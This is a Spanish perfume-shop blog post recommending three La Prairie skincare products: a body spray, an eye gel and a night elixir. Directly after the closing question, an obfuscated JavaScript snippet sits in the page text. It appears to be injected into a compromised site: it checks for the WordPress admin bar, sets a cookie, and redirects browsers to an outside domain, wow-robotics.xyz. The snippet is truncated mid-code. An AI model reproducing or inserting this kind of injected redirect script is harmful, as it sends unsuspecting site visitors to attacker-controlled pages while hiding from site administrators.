Si entre tus propósitos de año nuevo para el 2018 figuraba el de regalar más y mejores cuidados a tu piel, te apasionarán los tres productos de la prestigiosa marca La Prairie que te proponemos en esta entrada de nuestro blog. ¡Presta mucha atención a las propiedades e ingredientes de cada una de las sugerencias que te detallamos a continuación y elige el producto que mejor se adapte a las características de tu piel! Recuerda que en Perfumerías Tin Tin encontrarás un amplio abanico de productos a precios imbatibles.

 

la-prairie-cellular-energizing-body-spray

 

La Prairie Cellullar Energizing es un fabuloso body spray que incluye aceites de aromaterapia a partir de pomelo rojo de rubíes, cardamomo y verbena. Al aplicarlo sobre tu cuerpo experimentarás un efecto muy energizante y estimulante para todos tus sentidos. Además de una hidratación inmediata y completa, con este body spray conseguirás una sensación muy placentera y revitalizante gracias a la inigualable combinación de principios activos y aromas sugerentes. ¿Estás pensando en preparar tu cuerpo para San Valentín? ¡Entonces este es tu producto imprescindible de La Prairie!

 

 

 

la-prairie-skin-caviar-essence-eye-complex

La Prairie Skin Caviar Essence Eye Complex es un maravilloso gel que actúa muy rápidamente alrededor de tus ojos, como si de un mini lifting se tratara. Al aplicártelo notarás una reafirmación instantánea de esa zona debido a la acción nutritiva y energizante del producto, que consigue mejorar la textura y el tono de la zona del contorno de ojos: una zona especialmente vulnerable a los periodos de cansancio, estrés y fatiga. Este gel, además, ayuda a minimizar las finas arrugas y líneas de expresión que con la edad se forman alrededor de nuestros ojos, eliminando las imperfecciones más sutiles y aumentando también la capacidad de resistencia de los ojos al maquillaje. Si quieres cuidar esa zona tan crítica del rostro, hazte con tu Skin Caviar Essence Eye Complex de La Prairie y mira el mundo con otros ojos.

 

la-prairie-platinum-rare-cellular-night-elixir (1)

 

El Cellular Night Elixir es la joya de la corona de La Prairie: el producto rejuvenecedor más potente creado en los laboratorios de esta prestigiosa marca. Al aplicar este espectacular elixir se consigue una regeneración completa de tu piel, ya que estimula el proceso de purificación, nutrición y respiración de la piel, reforzando sus capacidades de autodefensa y mejorando su textura y elasticidad, reduciendo las líneas de expresión.

¿Conoces alguno de estos productos? ¡Comparte tus impresiones y comentarios! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone